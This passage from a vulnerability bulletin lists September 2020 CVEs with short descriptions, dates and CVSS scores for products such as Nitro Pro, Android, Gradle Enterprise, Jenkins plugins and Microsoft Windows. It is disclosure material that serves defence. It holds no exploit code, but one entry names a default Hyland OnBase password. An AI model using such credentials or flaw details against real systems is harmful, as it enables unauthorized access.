    gonitro -- nitro_pro An exploitable code execution vulnerability exists in the rendering functionality of Nitro Pro 13.13.2.242 and 13.16.2.300. When drawing the contents of a page and selecting the stroke color from an 'ICCBased' colorspace, the application will read a length from the file and use it as a loop sentinel when writing data into the member of an object. Due to the object member being a buffer of a static size allocated on the heap, this can result in a heap-based buffer overflow. A specially crafted document must be loaded by a victim in order to trigger this vulnerability. 2020-09-16 6.8 CVE-2020-6146
    MISC
    google -- android In hwservicemanager, there is a possible out of bounds write due to freeing a wild pointer. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-155646800 2020-09-18 4.6 CVE-2020-0273
    MISC
    google -- android An issue was discovered on LG mobile devices with Android OS 7.0, 7.1, 7.2, 8.0, and 8.1 software. Applications with sensitive security settings (such as the package verifier application) mishandle unknown-source installations. The LG ID is LVE-SMP-190002 (September 2020). 2020-09-11 5 CVE-2020-25281
    MISC
    google -- android In NFC, there is a possible out of bounds write due to uninitialized data. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-146453119 2020-09-18 4.6 CVE-2020-0326
    MISC
    google -- android In Bluetooth AVRCP, there is a possible leak of audio metadata due to residual data. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-150214479 2020-09-18 5 CVE-2020-0286
    MISC
    gradle -- enterprise An issue was discovered in Gradle Enterprise 2017.3 - 2020.2.4 and Gradle Enterprise Build Cache Node 1.0 - 9.2. Unrestricted HTTP header reflection allows remote attackers to obtain authentication cookies (if an XSS issue exists) via the /info/headers, /cache-info/headers, /admin-info/headers, /distribution-broker-info/headers, or /cache-node-info/headers path. 2020-09-18 5 CVE-2020-15768
    MISC
    CONFIRM
    gradle -- enterprise An issue was discovered in Gradle Enterprise 2018.5. There is a lack of lock-out after excessive failed login attempts. This allows a remote attacker to conduct brute-force guessing of a local user's password. 2020-09-18 5 CVE-2020-15770
    MISC
    CONFIRM
    gradle -- enterprise An issue was discovered in Gradle Enterprise before 2020.2.5. Lack of the secure attribute on the anti-CSRF cookie allows an attacker (with the ability to read HTTP traffic) to obtain a user's anti-CSRF token if the user initiates a cleartext HTTP request. 2020-09-18 4.3 CVE-2020-15767
    MISC
    CONFIRM
    gradle -- enterprise An issue was discovered in Gradle Enterprise 2018.2 - 2020.2.4. CSRF mitigation can be bypassed because the anti-CSRF token is in a cleartext cookie. 2020-09-18 6.8 CVE-2020-15776
    MISC
    CONFIRM
    gradle -- enterprise An issue was discovered in Gradle Enterprise 2020.2 - 2020.2.4. An XSS issue exists via the request URL. 2020-09-18 4.3 CVE-2020-15769
    MISC
    CONFIRM
    gradle -- enterprise An issue was discovered in Gradle Enterprise 2018.2 and Gradle Enterprise Build Cache Node 4.1. CSRF mitigation can be bypassed because cross-site transmission of a cookie (containing a CSRF token) can occur. 2020-09-18 5 CVE-2020-15771
    MISC
    CONFIRM
    gradle -- enterprise An issue was discovered in Gradle Enterprise 2018.5 - 2020.2.4. Because of implicitly remembered user-login information, physically proximate attackers can use a user session after browser closure. 2020-09-18 4.6 CVE-2020-15774
    MISC
    CONFIRM
    gradle -- enterprise An issue was discovered in Gradle Enterprise 2017.1 - 2020.2.4. Unrestricted access to a high-level system-usage summary allows an attacker to obtain project names and usage metrics. 2020-09-18 5 CVE-2020-15775
    MISC
    CONFIRM
    gradle -- enterprise An issue was discovered in Gradle Enterprise before 2020.2.4. Because of unrestricted cross-origin requests to read-only data in the Export API, an attacker can access data as a user (for the duration of the browser session) after previously explicitly authenticating with the API. 2020-09-18 4 CVE-2020-15773
    MISC
    CONFIRM
    gradle -- enterprise An issue was discovered in Gradle Enterprise 2018.5 - 2020.2.4. There is XXE with resultant SSRF via an uploaded SAML IDP configuration. 2020-09-18 4 CVE-2020-15772
    MISC
    CONFIRM
    hyland -- onbase An issue was discovered in Hyland OnBase through 18.0.0.32 and 19.x through 19.8.9.1000. PKI certificates have a private key that is the same across different customers' installations. 2020-09-11 6.4 CVE-2020-25256
    MISC
    hyland -- onbase An issue was discovered in Hyland OnBase through 18.0.0.32 and 19.x through 19.8.9.1000. Client-side authentication is used for critical functions such as adding users or retrieving sensitive information. 2020-09-11 6.4 CVE-2020-25251
    MISC
    hyland -- onbase An issue was discovered in Hyland OnBase through 18.0.0.32 and 19.x through 19.8.9.1000. The server typically logs activity only when a client application specifies that logging is desired. This can be problematic for use cases in a regulated industry, where server-side logging is required in additional situations. 2020-09-11 5 CVE-2020-25249
    MISC
    hyland -- onbase An issue was discovered in Hyland OnBase through 18.0.0.32 and 19.x through 19.8.9.1000. It allows remote attackers to cause a denial of service (outage of connection-request processing) via a long user ID, which triggers an exception and a large log entry. 2020-09-11 5 CVE-2020-25255
    MISC
    hyland -- onbase An issue was discovered in Hyland OnBase through 18.0.0.32 and 19.x through 19.8.9.1000. CSRF can be used to log in a user, and then perform actions, because there are default credentials (the wstinol password for the manager or hsi account). 2020-09-11 6.8 CVE-2020-25252
    MISC
    ibm -- maximo_asset_management IBM Maximo Asset Management 7.6.0 and 7.6.1 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 171437. 2020-09-15 6.5 CVE-2019-4671
    XF
    CONFIRM
    ibm -- maximo_asset_management IBM Maximo Asset Management 7.6.0 and 7.6.1 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 182436. 2020-09-15 4.3 CVE-2020-4526
    XF
    CONFIRM
    ibm -- spectrum_protect_plus IBM Spectrum Protect Plus 10.1.0 through 10.1.6 Administrative Console could allow an authenticated attacker to upload arbitrary files which could be execute arbitrary code on the vulnerable server. This vulnerability is due to an incomplete fix for CVE-2020-4470. IBM X-Force ID: 187188. 2020-09-15 6 CVE-2020-4703
    XF
    CONFIRM
    ibm -- spectrum_protect_plus IBM Spectrum Protect Plus 10.1.0 through 10.1.6 could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 187501. 2020-09-15 4 CVE-2020-4711
    XF
    CONFIRM
    inspircd -- inspircd An issue was discovered in InspIRCd 3 before 3.1.0. The silence module contains a use after free vulnerability. This vulnerability can be used for remote crashing of an InspIRCd server by any user able to fully connect to a server. 2020-09-11 6.8 CVE-2019-20918
    MISC
    MISC
    MISC
    inspircd -- inspircd An issue was discovered in InspIRCd 2 before 2.0.28 and 3 before 3.3.0. The mysql module contains a NULL pointer dereference when built against mariadb-connector-c 3.0.5 or newer. When combined with the sqlauth or sqloper modules, this vulnerability can be used for remote crashing of an InspIRCd server by any user able to connect to a server. 2020-09-11 6.8 CVE-2019-20917
    MISC
    MISC
    MISC
    MLIST
    DEBIAN
    inspircd -- inspircd An issue was discovered in InspIRCd 2 before 2.0.29 and 3 before 3.6.0. The pgsql module contains a use after free vulnerability. When combined with the sqlauth or sqloper modules, this vulnerability can be used for remote crashing of an InspIRCd server by any user able to connect to a server. 2020-09-11 6.8 CVE-2020-25269
    MISC
    MISC
    MISC
    MLIST
    DEBIAN
    istio-operator_project -- istio-operator An incorrect access control flaw was found in the operator, openshift-service-mesh/istio-rhel8-operator all versions through 1.1.3. This flaw allows an attacker with a basic level of access to the cluster to deploy a custom gateway/pod to any namespace, potentially gaining access to privileged service account tokens. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. 2020-09-16 6.5 CVE-2020-14306
    MISC
    MISC
    jenkins -- blue_ocean A missing permission check in Jenkins Blue Ocean Plugin 1.23.2 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL. 2020-09-16 4 CVE-2020-2255
    MLIST
    CONFIRM
    jenkins -- copy_data_to_workspace Jenkins Copy data to workspace Plugin 1.0 and earlier does not limit which directories can be copied from the Jenkins controller to job workspaces, allowing attackers with Job/Configure permission to read arbitrary files on the Jenkins controller. 2020-09-16 4 CVE-2020-2275
    MLIST
    CONFIRM
    jenkins -- elastest A cross-site request forgery (CSRF) vulnerability in Jenkins ElasTest Plugin 1.2.1 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credentials. 2020-09-16 4.3 CVE-2020-2273
    MLIST
    CONFIRM
    jenkins -- elastest A missing permission check in Jenkins ElasTest Plugin 1.2.1 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials. 2020-09-16 4 CVE-2020-2272
    MLIST
    CONFIRM
    jenkins -- email_extension Jenkins Email Extension Plugin 2.75 and earlier does not perform hostname validation when connecting to the configured SMTP server. 2020-09-16 5.8 CVE-2020-2253
    MLIST
    CONFIRM
    jenkins -- health_advisor_by_cloudbees Jenkins Health Advisor by CloudBees Plugin 3.2.0 and earlier does not correctly perform a permission check in an HTTP endpoint, allowing attackers with Overall/Read permission to view that HTTP endpoint. 2020-09-16 4 CVE-2020-2258
    MLIST
    CONFIRM
    jenkins -- mailer Jenkins Mailer Plugin 1.32 and earlier does not perform hostname validation when connecting to the configured SMTP server. 2020-09-16 5.8 CVE-2020-2252
    MLIST
    CONFIRM
    jenkins -- mongodb A missing permission check in Jenkins MongoDB Plugin 1.3 and earlier allows attackers with Overall/Read permission to gain access to some metadata of any arbitrary files on the Jenkins controller. 2020-09-16 4 CVE-2020-2267
    MLIST
    CONFIRM
    jenkins -- perfecto A missing permission check in Jenkins Perfecto Plugin 1.17 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified HTTP URL using attacker-specified credentials. 2020-09-16 4 CVE-2020-2260
    MLIST
    CONFIRM
    jenkins -- perfecto Jenkins Perfecto Plugin 1.17 and earlier executes a command on the Jenkins controller, allowing attackers with Job/Configure permission to run arbitrary commands on the Jenkins controller 2020-09-16 6.5 CVE-2020-2261
    MLIST
    CONFIRM
    jenkins -- storable_configs Jenkins Storable Configs Plugin 1.0 and earlier allows users with Job/Read permission to read arbitrary files on the Jenkins controller. 2020-09-16 4 CVE-2020-2277
    MLIST
    CONFIRM
    jenkins -- storable_configs Jenkins Storable Configs Plugin 1.0 and earlier does not restrict the user-specified file name, allowing attackers with Job/Configure permission to replace any other '.xml' file on the Jenkins controller with a job config.xml file's content. 2020-09-16 4 CVE-2020-2278
    MLIST
    CONFIRM
    kaiostech -- kaios An issue was discovered in KaiOS 1.0, 2.5, and 2.5.12.5. The pre-installed Email application is vulnerable to HTML and JavaScript injection attacks. An attacker can send a specially crafted email to the victim that will inject HTML into the email application's UI as soon as the email is opened. At a bare minimum, this allows an attacker to take control over the Email application's UI (e.g., display a malicious prompt to the user asking them to re-enter their email credentials) and also allows an attacker to abuse any of the privileges available to the mobile application. 2020-09-14 4.3 CVE-2019-14756
    MISC
    kaiostech -- kaios An issue was discovered in KaiOS 2.5 and 2.5.1. The pre-installed Contacts application is vulnerable to HTML and JavaScript injection attacks. An attacker can send a vCard file to the victim that will inject HTML into the Contacts application (assuming the victim chooses to import the file). At a bare minimum, this allows an attacker to take control over the Contacts application's UI (e.g., display a malicious prompt to the user asking them to re-enter credentials such as their KaiOS credentials to continue using the application) and also allows an attacker to abuse any of the privileges available to the mobile application. 2020-09-14 4.3 CVE-2019-14757
    MISC
    MISC
    kaiostech -- kaios An issue was discovered in KaiOS 2.5 and 2.5.1. The pre-installed File Manager application is vulnerable to HTML and JavaScript injection attacks. An attacker can send a file via email to the victim that will inject HTML into the File Manager application (assuming the victim chooses to download the email attachment). At a bare minimum, this allows an attacker to take control over the File Manager application's UI (e.g., display a malicious prompt to the user asking them to re-enter credentials such as their KaiOS credentials to continue using the application) and also allows an attacker to abuse any of the privileges available to the mobile application. 2020-09-14 4.3 CVE-2019-14758
    MISC
    MISC
    kingsoft -- wps_office GdiDrawHoriLineIAlt in Kingsoft WPS Office before 11.2.0.9403 allows remote heap corruption via a crafted PLTE chunk in PNG data within a Word document. This is related to QBrush::setMatrix in gui/painting/qbrush.cpp in Qt 4.x. 2020-09-13 6.8 CVE-2020-25291
    MISC
    linux -- linux_kernel A race condition between hugetlb sysctl handlers in mm/hugetlb.c in the Linux kernel before 5.8.8 could be used by local attackers to corrupt memory, cause a NULL pointer dereference, or possibly have unspecified other impact, aka CID-17743798d812. 2020-09-13 4.4 CVE-2020-25285
    MISC
    MISC
    MISC
    linux4sam -- at91bootstrap AT91bootstrap before 3.9.2 does not properly wipe encryption and authentication keys from memory before passing control to a less privileged software component. This can be exploited to disclose these keys and subsequently encrypt and sign the next boot stage (such as the bootloader). 2020-09-14 6.4 CVE-2020-11684
    MISC
    MISC
    linux4sam -- at91bootstrap A timing side channel was discovered in AT91bootstrap before 3.9.2. It can be exploited by attackers with physical access to forge CMAC values and subsequently boot arbitrary code on an affected system. 2020-09-14 4.6 CVE-2020-11683
    MISC
    MISC
    mcafee -- email_gateway Path Traversal vulnerability in McAfee McAfee Email Gateway (MEG) prior to 7.6.406 allows remote attackers to traverse the file system to access files or directories that are outside of the restricted directory via external input to construct a path name that should be within a restricted directory. 2020-09-16 4 CVE-2020-7268
    MISC
    mcafee -- web_gateway Privilege Escalation vulnerability in McAfee Web Gateway (MWG) prior to 9.2.1 allows authenticated user interface user to delete or download protected log data via improper access controls in the user interface. 2020-09-15 4.1 CVE-2020-7295
    CONFIRM
    mcafee -- web_gateway Privilege Escalation vulnerability in McAfee Web Gateway (MWG) prior to 9.2.1 allows authenticated user interface user to delete or download protected files via improper access controls in the REST interface. 2020-09-15 4.1 CVE-2020-7294
    CONFIRM
    microchip -- atsama5d21c-cu_firmware CMAC verification functionality in Microchip Atmel ATSAMA5 products is vulnerable to vulnerable to timing and power analysis attacks. 2020-09-14 5 CVE-2020-12788
    MISC
    microchip -- atsama5d21c-cu_firmware The Secure Monitor in Microchip Atmel ATSAMA5 products use a hardcoded key to encrypt and authenticate secure applets. 2020-09-14 4.3 CVE-2020-12789
    MISC
    microchip -- atsama5d21c-cu_firmware Microchip Atmel ATSAMA5 products in Secure Mode allow an attacker to bypass existing security mechanisms related to applet handling. 2020-09-14 4.3 CVE-2020-12787
    MISC
    microsoft -- 365_apps An information disclosure vulnerability exists when Microsoft Excel improperly discloses the contents of its memory, aka 'Microsoft Excel Information Disclosure Vulnerability'. 2020-09-11 4.3 CVE-2020-1224
    N/A
    microsoft -- 365_apps A remote code execution vulnerability exists in Microsoft Word software when it fails to properly handle objects in memory, aka 'Microsoft Word Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1338. 2020-09-11 6.8 CVE-2020-1218
    N/A
    microsoft -- 365_apps A remote code execution vulnerability exists in Microsoft Word software when it fails to properly handle objects in memory, aka 'Microsoft Word Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1218. 2020-09-11 6.8 CVE-2020-1338
    N/A
    microsoft -- asp.net_core A security feature bypass vulnerability exists in the way Microsoft ASP.NET Core parses encoded cookie names.The ASP.NET Core cookie parser decodes entire cookie strings which could allow a malicious attacker to set a second cookie with the name being percent encoded.The security update addresses the vulnerability by fixing the way the ASP.NET Core cookie parser handles encoded names., aka 'Microsoft ASP.NET Core Security Feature Bypass Vulnerability'. 2020-09-11 5 CVE-2020-1045
    FEDORA
    N/A
    microsoft -- dynamics_365 A remote code execution vulnerability exists in Microsoft Dynamics 365 (on-premises) when the server fails to properly sanitize web requests to an affected Dynamics server, aka 'Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16860. 2020-09-11 6.5 CVE-2020-16862
    N/A
    microsoft -- dynamics_365 A remote code execution vulnerability exists in Microsoft Dynamics 365 (on-premises) when the server fails to properly sanitize web requests to an affected Dynamics server, aka 'Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16862. 2020-09-11 6.5 CVE-2020-16860
    N/A
    microsoft -- dynamics_365_for_finance_and_operations A remote code execution vulnerability exists in Microsoft Dynamics 365 for Finance and Operations (on-premises) version 10.0.11, aka 'Microsoft Dynamics 365 for Finance and Operations (on-premises) Remote Code Execution Vulnerability'. 2020-09-11 6.5 CVE-2020-16857
    N/A
    microsoft -- edge A remote code execution vulnerability exists in the way that the IEToEdge Browser Helper Object (BHO) plugin on Internet Explorer handles objects in memory, aka 'Internet Explorer Browser Helper Object (BHO) Memory Corruption Vulnerability'. 2020-09-11 6.8 CVE-2020-16884
    N/A
    microsoft -- internet_explorer A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory, aka 'Microsoft Browser Memory Corruption Vulnerability'. 2020-09-11 5.1 CVE-2020-0878
    N/A
    microsoft -- internet_explorer An elevation of privilege vulnerability exists in the way that the Wininit.dll handles objects in memory, aka 'Windows Start-Up Application Elevation of Privilege Vulnerability'. 2020-09-11 6.8 CVE-2020-1506
    N/A
    microsoft -- internet_explorer An elevation of privilege vulnerability exists in the way that the Wininit.dll handles objects in memory, aka 'WinINet API Elevation of Privilege Vulnerability'. 2020-09-11 6.8 CVE-2020-1012
    N/A
    microsoft -- office An information disclosure vulnerability exists when Microsoft Office software reads out of bound memory due to an uninitialized variable, which could disclose the contents of memory, aka 'Microsoft Office Information Disclosure Vulnerability'. 2020-09-11 4.3 CVE-2020-16855
    N/A
    microsoft -- sharepoint_enterprise_server A spoofing vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft SharePoint Spoofing Vulnerability'. 2020-09-11 4.9 CVE-2020-1205
    N/A
    microsoft -- sharepoint_enterprise_server A remote code execution vulnerability exists in Microsoft SharePoint Server when it fails to properly identify and filter unsafe ASP.Net web controls, aka 'Microsoft SharePoint Server Remote Code Execution Vulnerability'. 2020-09-11 6.5 CVE-2020-1460
    N/A
    microsoft -- sharepoint_enterprise_server A tampering vulnerability exists when Microsoft SharePoint Server fails to properly handle profile data, aka 'Microsoft SharePoint Server Tampering Vulnerability'. This CVE ID is unique from CVE-2020-1523. 2020-09-11 4 CVE-2020-1440
    N/A
    microsoft -- sharepoint_server A tampering vulnerability exists when Microsoft SharePoint Server fails to properly handle profile data, aka 'Microsoft SharePoint Server Tampering Vulnerability'. This CVE ID is unique from CVE-2020-1440. 2020-09-11 4 CVE-2020-1523
    N/A
    microsoft -- sql_server_reporting_services A security feature bypass vulnerability exists in SQL Server Reporting Services (SSRS) when the server improperly validates attachments uploaded to reports, aka 'SQL Server Reporting Services Security Feature Bypass Vulnerability'. 2020-09-11 4 CVE-2020-1044
    N/A
    microsoft -- visual_studio An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector improperly handles data operations, aka 'Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1133. 2020-09-11 4.6 CVE-2020-1130
    N/A
    microsoft -- visual_studio An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector improperly handles file operations, aka 'Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1130. 2020-09-11 4.6 CVE-2020-1133
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Windows Function Discovery SSDP Provider improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Function Discovery SSDP Provider Elevation of Privilege Vulnerability'. 2020-09-11 4.6 CVE-2020-0912
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists in the way that fdSSDP.dll handles objects in memory, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1052, CVE-2020-1159. 2020-09-11 4.6 CVE-2020-1376
    N/A
    microsoft -- windows_10 A remote code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory, aka 'Microsoft Windows Codecs Library Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1319. 2020-09-11 6.8 CVE-2020-1129
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Microsoft Store Runtime improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Microsoft Store Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0766. 2020-09-11 4.6 CVE-2020-1146
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists in the way that the StartTileData.dll handles file creation in protected locations, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1052, CVE-2020-1376. 2020-09-11 4.6 CVE-2020-1159
    N/A
    microsoft -- windows_10 A remote code execution vulnerability exists when Windows improperly handles objects in memory, aka 'Windows Remote Code Execution Vulnerability'. 2020-09-11 6.8 CVE-2020-1252
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists in the way that the Windows Function Discovery Service handles objects in memory, aka 'Windows Function Discovery Service Elevation of Privilege Vulnerability'. 2020-09-11 4.6 CVE-2020-1491
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Windows InstallService improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows InstallService Elevation of Privilege Vulnerability'. 2020-09-11 4.6 CVE-2020-1532
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1303. 2020-09-11 6.8 CVE-2020-1169
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when Windows improperly handles calls to Win32k.sys, aka 'Windows Win32k Elevation of Privilege Vulnerability'. 2020-09-11 4.6 CVE-2020-1152
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory, aka 'DirectX Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1308. 2020-09-11 4.6 CVE-2020-1053
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory, aka 'Windows Common Log File System Driver Elevation of Privilege Vulnerability'. 2020-09-11 4.6 CVE-2020-1115
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Shell infrastructure component improperly handles objects in memory, aka 'Windows Shell Infrastructure Component Elevation of Privilege Vulnerability'. 2020-09-11 4.6 CVE-2020-1098
    N/A
    microsoft -- windows_10 A denial of service vulnerability exists when Windows Routing Utilities improperly handles objects in memory, aka 'Windows Routing Utilities Denial of Service'. 2020-09-11 4.9 CVE-2020-1038
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists in the way that the ssdpsrv.dll handles objects in memory, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1159, CVE-2020-1376. 2020-09-11 4.6 CVE-2020-1052
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when Microsoft Windows CloudExperienceHost fails to check COM objects, aka 'Windows CloudExperienceHost Elevation of Privilege Vulnerability'. 2020-09-11 4.6 CVE-2020-1471
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists in the way that the dnsrslvr.dll handles objects in memory, aka 'Windows dnsrslvr.dll Elevation of Privilege Vulnerability'. 2020-09-11 4.6 CVE-2020-0839
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists in the way that Microsoft COM for Windows handles objects in memory, aka 'Microsoft COM for Windows Elevation of Privilege Vulnerability'. 2020-09-11 6.8 CVE-2020-1507
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory, aka 'Windows Graphics Component Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-1091. 2020-09-11 4.3 CVE-2020-1097
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory, aka 'Windows Graphics Component Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-1097. 2020-09-11 4.3 CVE-2020-1091
    N/A
    microsoft -- windows_10 A remote code execution vulnerability exists when Windows Media Audio Decoder improperly handles objects, aka 'Windows Media Audio Decoder Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1508. 2020-09-11 6.8 CVE-2020-1593
    N/A
    microsoft -- windows_10 A local elevation of privilege vulnerability exists in how splwow64.exe handles certain calls, aka 'Microsoft splwow64 Elevation of Privilege Vulnerability'. 2020-09-11 4.6 CVE-2020-0790
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Windows Universal Plug and Play (UPnP) service improperly handles objects in memory, aka 'Windows UPnP Service Elevation of Privilege Vulnerability'. 2020-09-11 4.6 CVE-2020-1598
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory, aka 'Windows GDI Information Disclosure Vulnerability'. 2020-09-11 4.3 CVE-2020-1256
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists in how splwow64.exe handles certain calls, aka 'Microsoft splwow64 Information Disclosure Vulnerability'. 2020-09-11 4.3 CVE-2020-0875
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists in the way that the Windows Server DHCP service improperly discloses the contents of its memory.To exploit the vulnerability, an unauthenticated attacker could send a specially crafted packet to an affected DHCP server, aka 'Windows DHCP Server Information Disclosure Vulnerability'. 2020-09-11 5 CVE-2020-1031
    N/A
    microsoft -- windows_10 A denial of service vulnerability exists when Microsoft Hyper-V on a host server fails to properly validate specific malicious data from a user on a guest operating system.To exploit the vulnerability, an attacker who already has a privileged account on a guest operating system, running as a virtual machine, could run a specially crafted application.The security update addresses the vulnerability by resolving the conditions where Hyper-V would fail to handle these requests., aka 'Windows Hyper-V Denial of Service Vulnerability'. This CVE ID is unique from CVE-2020-0904. 2020-09-11 4.9 CVE-2020-0890
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Windows Storage Services improperly handle file operations, aka 'Windows Storage Services Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0886. 2020-09-11 4.6 CVE-2020-1559
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1169. 2020-09-11 6.8 CVE-2020-1303
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Windows Language Pack Installer improperly handles file operations, aka 'Windows Language Pack Installer Elevation of Privilege Vulnerability'. 2020-09-11 4.6 CVE-2020-1122
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Windows RSoP Service Application improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows RSoP Service Application Elevation of Privilege Vulnerability'. 2020-09-11 4.6 CVE-2020-0648
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Microsoft Store Runtime improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Microsoft Store Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1146. 2020-09-11 4.6 CVE-2020-0766
    N/A
    microsoft -- windows_10 A spoofing vulnerability exists when Active Directory Federation Services (ADFS) improperly handles multi-factor authentication requests.To exploit this vulnerability, an attacker could send a specially crafted authentication request, aka 'ADFS Spoofing Vulnerability'. 2020-09-11 4 CVE-2020-0837
    N/A
    microsoft -- windows_server_2008 An information disclosure vulnerability exists when Active Directory integrated DNS (ADIDNS) mishandles objects in memory, aka 'Active Directory Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0856. 2020-09-11 4 CVE-2020-0664
    N/A
    microsoft -- windows_server_2008 A denial of service vulnerability exists in Windows DNS when it fails to properly handle queries, aka 'Windows DNS Denial of Service Vulnerability'. This CVE ID is unique from CVE-2020-0836. 2020-09-11 4 CVE-2020-1228
    N/A
    microsoft -- windows_server_2008 A remote code execution vulnerability exists when Active Directory integrated DNS (ADIDNS) mishandles objects in memory, aka 'Active Directory Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-0761. 2020-09-11 6.5 CVE-2020-0718
    N/A
    microsoft -- windows_server_2008 A denial of service vulnerability exists in Windows DNS when it fails to properly handle queries, aka 'Windows DNS Denial of Service Vulnerability'. This CVE ID is unique from CVE-2020-1228. 2020-09-11 5 CVE-2020-0836
    N/A
    microsoft -- windows_server_2008 An information disclosure vulnerability exists when Active Directory integrated DNS (ADIDNS) mishandles objects in memory, aka 'Active Directory Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0664. 2020-09-11 4 CVE-2020-0856
    N/A
    microsoft -- windows_server_2008 A remote code execution vulnerability exists when Active Directory integrated DNS (ADIDNS) mishandles objects in memory, aka 'Active Directory Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-0718. 2020-09-11 6.5 CVE-2020-0761
    N/A
    microsoft -- xamarin.forms A spoofing vulnerability manifests in Microsoft Xamarin.Forms due to the default settings on Android WebView version prior to 83.0.4103.106, aka 'Xamarin.Forms Spoofing Vulnerability'. 2020-09-11 6.8 CVE-2020-16873
    N/A
    mikrotik -- routeros An array index error in MikroTik RouterOS 6.41.3 through 6.46.5, and 7.x through 7.0 Beta5, allows an unauthenticated remote attacker to crash the SMB server via modified setup-request packets, aka SUP-12964. 2020-09-14 5 CVE-2020-11881
    MISC
    MISC
    perl -- dbi An issue was discovered in the DBI module before 1.632 for Perl. Using many arguments to methods for Callbacks may lead to memory corruption. 2020-09-11 5 CVE-2013-7490
    MISC
    MISC
    MISC
    UBUNTU
    perl -- dbi An issue was discovered in the DBI module before 1.628 for Perl. Stack corruption occurs when a user-defined function requires a non-trivial amount of memory and the Perl stack gets reallocated. 2020-09-11 5 CVE-2013-7491
    MISC
    MISC
    MISC
    perl -- dbi An issue was discovered in the DBI module before 1.632 for Perl. DBD::File drivers can open files from folders other than those specifically passed via the f_dir attribute. 2020-09-11 5 CVE-2014-10401
    MISC
    MISC
    MISC
    UBUNTU
